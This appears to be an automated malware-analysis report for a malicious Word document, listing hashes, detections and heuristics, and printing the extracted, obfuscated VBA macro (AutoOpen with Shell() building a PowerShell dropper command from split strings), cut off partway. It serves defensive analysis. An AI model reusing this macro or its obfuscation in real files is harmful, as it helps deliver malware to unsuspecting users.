Office (OLE) malware analysis — malicious · a52cc32b8836f3de

MALICIOUS

Office (OLE)

188.8 KB Created: 2018-06-22 14:45:00 Authoring application: Microsoft Office Word First seen: 2019-04-17

MD5: d5a3bd0fd687726e38f49730b7f186df SHA-1: 6da32ba3730dd4896248f292353f834f5f057646 SHA-256: a52cc32b8836f3deb2b70df10782bb6bcefbbfc09b43de5936e344e9ca3811e1

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses the Shell() function to execute a PowerShell command. The reconstructed PowerShell command is 'Set-IT -var iAble:Of 'var iAble:Of '21}80t82e93K105v17N12N17Z95K84>70Z28>94}83v91v84v82>69N17w67K80!9', which is likely designed to download and execute a second-stage payload. The ClamAV detection 'Doc.Dropper.Agent-6592389-0' further supports its malicious nature as a dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6586652-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6586652-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 26095 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	26095 bytes
SHA-256: `25c5457b450b03ea0eec9d31b509abc1518ab0b3bf2e5c61dac4d8d73efe3058`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "SSFwsJuwMNlmzF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "pjucnCivuGkn" Function zACHBCvvHB() On Error Resume Next hWNzqz = (RiWbA * 36703 + 19362 * CInt(TNfjjZ - CDbl(22560)) * 63829 * Oct(75613)) nTlPXnfMLao = "He" + "ll" + " " + Chr(34) + " $(" + "Se" + "t-" + "IT" SEtzIo = (wdQNWo * 77292 + 3144 * CInt(LnEIin - CDbl(9201)) * 48438 * Oct(43533)) KKPlotEApX = "EM" + " '" + "vaR" + "iA" + "bL" + "E:" + "Of" aFJJV = (ZNYsJT * 41689 + 65171 * CInt(EptbzZ - CDbl(82596)) * 65711 * Oct(15609)) jCXZtivnhc = "s'" + " ''" + " ) " + Chr(34) + " " + "+[s" YciHi = (UbIOcn * 39021 + 89997 * CInt(wbQJS - CDbl(84516)) * 34521 * Oct(43769)) LmobTEqHl = "TRi" + "ng" + "]('" + "21}" zACHBCvvHB = nTlPXnfMLao + KKPlotEApX + jCXZtivnhc + LmobTEqHl awLwZ = (jXBvzN * 90379 + 11613 * CInt(sosNTR - CDbl(32882)) * 41028 * Oct(97761)) End Function Function liEnumiOthB() On Error Resume Next AzaYq = (GFQhj * 78249 + 42631 * CInt(jfElY - CDbl(94747)) * 21110 * Oct(2741)) uRQzc = "11" + "2}" + "80" + "t8" WQdzE = (wJcMv * 47893 + 56724 * CInt(wLarH - CDbl(59242)) * 47242 * Oct(25208)) IiSLNEQ = "2e9" + "3K1" + "05v" + "17N" + "12" + "N17" SrjnM = (wBszcE * 16018 + 24802 * CInt(BCTYD - CDbl(54575)) * 51940 * Oct(54925)) FlqprBBDOSk = "Z95" + "K84" + ">70" + "Z2" + "8>9" + "4}8" + "3v9" XGawF = (WwJMK * 15462 + 46641 * CInt(kdfKD - CDbl(49364)) * 1212 * Oct(8060)) AaYnaIIO = "1v8" + "4v" + "82" + ">6" + "9N" wDpFLA = (brOcQ * 11814 + 8862 * CInt(vocjuv - CDbl(4517)) * 27390 * Oct(56299)) EbbQJdhXDFC = "17w" + "67" + "K80" + "!95" + "N8" + "5N" juXRXC = (TQcuQ * 97039 + 21482 * CInt(AlStvA - CDbl(57646)) * 48441 * Oct(64807)) OwZUljdV = "94" + "t9" + "2}" + "10!" OzUJu = (pMTcFl * 19011 + 38062 * CInt(awpcD - CDbl(60833)) * 80532 * Oct(33561)) fdYVnqDbtm = "21!" + "70" + "}12" + "5>1" + "27" + "}71" + "N1" liEnumiOthB = uRQzc + IiSLNEQ + FlqprBBDOSk + AaYnaIIO + EbbQJdhXDFC + OwZUljdV + fdYVnqDbtm uKjUhl = (VqCJF * 66489 + 18475 * CInt(jEDfi - CDbl(82531)) * 28029 * Oct(52574)) End Function Function anEpCHJW() On Error Resume Next hVDowi = (YfkPkM * 39927 + 58891 * CInt(WjvHKF - CDbl(83728)) * 75645 * Oct(37733)) LKjuzf = "07" + "N1" + "7e1" + "2>1" wcKitf = (knMiQY * 23199 + 36785 * CInt(awulTk - CDbl(47782)) * 94615 * Oct(23117)) PcizJBQOzi = "7t" + "95" + "v8" + "4w" TUobd = (UAfHO * 94443 + 82978 * CInt(BchRzG - CDbl(21883)) * 68148 * Oct(77295)) XlQwjVLUNX = "70N" + "28N" + "94K" + "83" ftshcO = (NWmMP * 92244 + 22297 * CInt(SwXjLV - CDbl(56027)) * 13824 * Oct(22136)) KDwGwZ = "Z9" + "1!8" + "4t8" + "2e" rCGzGv = (fNvkXn * 47000 + 32300 * CInt(AaEWm - CDbl(62058)) * 42127 * Oct(66927)) KaptFt = "69" + "!17" + ">98" JnCcEC = (hwkLwP * 31670 + 81953 * CInt(jiPwvJ - CDbl(98807)) * 30701 * Oct(15200)) GaWmziBwz = "t7" + "2e6" + "6K6" CCpwL = (YQwHjD * 17380 + 87371 * CInt(pqnEHk - CDbl(19568)) * 27635 * Oct(86532)) FRjvq = "9t" + "84" + "Z92" + "K31" + "!1" anEpCHJW = LKjuzf + PcizJBQOzi + XlQwjVLUNX + KDwGwZ + KaptFt + GaWmziBwz + FRjvq wGkmA = (mUjAjr * 96427 + 49393 * CInt(YzUiwf - CDbl(48516)) * 42643 * Oct(322)) End Function Function RtmmjB() On Error Resume Next TLKAl = (nwvNan * 58179 + 91547 * CInt(ujZtO - CDbl(96193)) * 84545 * Oct(26680)) nPSMO = "27" + "!84" + ">6" + "9K" + "31" jkpfw = (Ykkjh * 54526 + 53360 * CInt(wHvvC - CDbl(24020)) * 8648 * Oct(69631)) qYGSEzcjXH = "}10" + "2t" + "84" + "}83" + "v11" + "4}" + "93" YOCwz = (lHbzkQ * 308 + 4648 * CInt(zYoqD - CDbl(94741)) * 27140 * Oct(83581)) zOhqF = "}8" + "8K" + "84e" OblSC = (BVzPRQ * 89840 + 50996 * CInt(HwZGi - CDbl(82243)) * 6264 * Oct(96124)) VYWouLhEEo = "95" + "v6" + "9>1" + "0e2" + "1w" + "102" + "e1" RtmmjB = nPSMO + qYGSEzcjXH + zOhqF + VYWouLhEEo nwdYO = (YKXjhX * 83018 + 36321 * CInt(lwPRk - CDbl(71479)) * 82991 * Oct(9318)) End Function Function LuFSFzo() On ... (truncated)

SHA-256: 25c5457b450b03ea0eec9d31b509abc1518ab0b3bf2e5c61dac4d8d73efe3058

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "SSFwsJuwMNlmzF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "pjucnCivuGkn"
Function zACHBCvvHB()
On Error Resume Next
hWNzqz = (RiWbA * 36703 + 19362 * CInt(TNfjjZ - CDbl(22560)) * 63829 * Oct(75613))
nTlPXnfMLao = "He" + "ll" + " " + Chr(34) + " $(" + "Se" + "t-" + "IT"
SEtzIo = (wdQNWo * 77292 + 3144 * CInt(LnEIin - CDbl(9201)) * 48438 * Oct(43533))
KKPlotEApX = "EM" + "  '" + "vaR" + "iA" + "bL" + "E:" + "Of"
aFJJV = (ZNYsJT * 41689 + 65171 * CInt(EptbzZ - CDbl(82596)) * 65711 * Oct(15609))
jCXZtivnhc = "s'" + " ''" + " ) " + Chr(34) + " " + "+[s"
YciHi = (UbIOcn * 39021 + 89997 * CInt(wbQJS - CDbl(84516)) * 34521 * Oct(43769))
LmobTEqHl = "TRi" + "ng" + "]('" + "21}"
zACHBCvvHB = nTlPXnfMLao + KKPlotEApX + jCXZtivnhc + LmobTEqHl
awLwZ = (jXBvzN * 90379 + 11613 * CInt(sosNTR - CDbl(32882)) * 41028 * Oct(97761))
End Function
Function liEnumiOthB()
On Error Resume Next
AzaYq = (GFQhj * 78249 + 42631 * CInt(jfElY - CDbl(94747)) * 21110 * Oct(2741))
uRQzc = "11" + "2}" + "80" + "t8"
WQdzE = (wJcMv * 47893 + 56724 * CInt(wLarH - CDbl(59242)) * 47242 * Oct(25208))
IiSLNEQ = "2e9" + "3K1" + "05v" + "17N" + "12" + "N17"
SrjnM = (wBszcE * 16018 + 24802 * CInt(BCTYD - CDbl(54575)) * 51940 * Oct(54925))
FlqprBBDOSk = "Z95" + "K84" + ">70" + "Z2" + "8>9" + "4}8" + "3v9"
XGawF = (WwJMK * 15462 + 46641 * CInt(kdfKD - CDbl(49364)) * 1212 * Oct(8060))
AaYnaIIO = "1v8" + "4v" + "82" + ">6" + "9N"
wDpFLA = (brOcQ * 11814 + 8862 * CInt(vocjuv - CDbl(4517)) * 27390 * Oct(56299))
EbbQJdhXDFC = "17w" + "67" + "K80" + "!95" + "N8" + "5N"
juXRXC = (TQcuQ * 97039 + 21482 * CInt(AlStvA - CDbl(57646)) * 48441 * Oct(64807))
OwZUljdV = "94" + "t9" + "2}" + "10!"
OzUJu = (pMTcFl * 19011 + 38062 * CInt(awpcD - CDbl(60833)) * 80532 * Oct(33561))
fdYVnqDbtm = "21!" + "70" + "}12" + "5>1" + "27" + "}71" + "N1"
liEnumiOthB = uRQzc + IiSLNEQ + FlqprBBDOSk + AaYnaIIO + EbbQJdhXDFC + OwZUljdV + fdYVnqDbtm
uKjUhl = (VqCJF * 66489 + 18475 * CInt(jEDfi - CDbl(82531)) * 28029 * Oct(52574))
End Function
Function anEpCHJW()
On Error Resume Next
hVDowi = (YfkPkM * 39927 + 58891 * CInt(WjvHKF - CDbl(83728)) * 75645 * Oct(37733))
LKjuzf = "07" + "N1" + "7e1" + "2>1"
wcKitf = (knMiQY * 23199 + 36785 * CInt(awulTk - CDbl(47782)) * 94615 * Oct(23117))
PcizJBQOzi = "7t" + "95" + "v8" + "4w"
TUobd = (UAfHO * 94443 + 82978 * CInt(BchRzG - CDbl(21883)) * 68148 * Oct(77295))
XlQwjVLUNX = "70N" + "28N" + "94K" + "83"
ftshcO = (NWmMP * 92244 + 22297 * CInt(SwXjLV - CDbl(56027)) * 13824 * Oct(22136))
KDwGwZ = "Z9" + "1!8" + "4t8" + "2e"
rCGzGv = (fNvkXn * 47000 + 32300 * CInt(AaEWm - CDbl(62058)) * 42127 * Oct(66927))
KaptFt = "69" + "!17" + ">98"
JnCcEC = (hwkLwP * 31670 + 81953 * CInt(jiPwvJ - CDbl(98807)) * 30701 * Oct(15200))
GaWmziBwz = "t7" + "2e6" + "6K6"
CCpwL = (YQwHjD * 17380 + 87371 * CInt(pqnEHk - CDbl(19568)) * 27635 * Oct(86532))
FRjvq = "9t" + "84" + "Z92" + "K31" + "!1"
anEpCHJW = LKjuzf + PcizJBQOzi + XlQwjVLUNX + KDwGwZ + KaptFt + GaWmziBwz + FRjvq
wGkmA = (mUjAjr * 96427 + 49393 * CInt(YzUiwf - CDbl(48516)) * 42643 * Oct(322))
End Function
Function RtmmjB()
On Error Resume Next
TLKAl = (nwvNan * 58179 + 91547 * CInt(ujZtO - CDbl(96193)) * 84545 * Oct(26680))
nPSMO = "27" + "!84" + ">6" + "9K" + "31"
jkpfw = (Ykkjh * 54526 + 53360 * CInt(wHvvC - CDbl(24020)) * 8648 * Oct(69631))
qYGSEzcjXH = "}10" + "2t" + "84" + "}83" + "v11" + "4}" + "93"
YOCwz = (lHbzkQ * 308 + 4648 * CInt(zYoqD - CDbl(94741)) * 27140 * Oct(83581))
zOhqF = "}8" + "8K" + "84e"
OblSC = (BVzPRQ * 89840 + 50996 * CInt(HwZGi - CDbl(82243)) * 6264 * Oct(96124))
VYWouLhEEo = "95" + "v6" + "9>1" + "0e2" + "1w" + "102" + "e1"
RtmmjB = nPSMO + qYGSEzcjXH + zOhqF + VYWouLhEEo
nwdYO = (YKXjhX * 83018 + 36321 * CInt(lwPRk - CDbl(71479)) * 82991 * Oct(9318))
End Function
Function LuFSFzo()
On 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.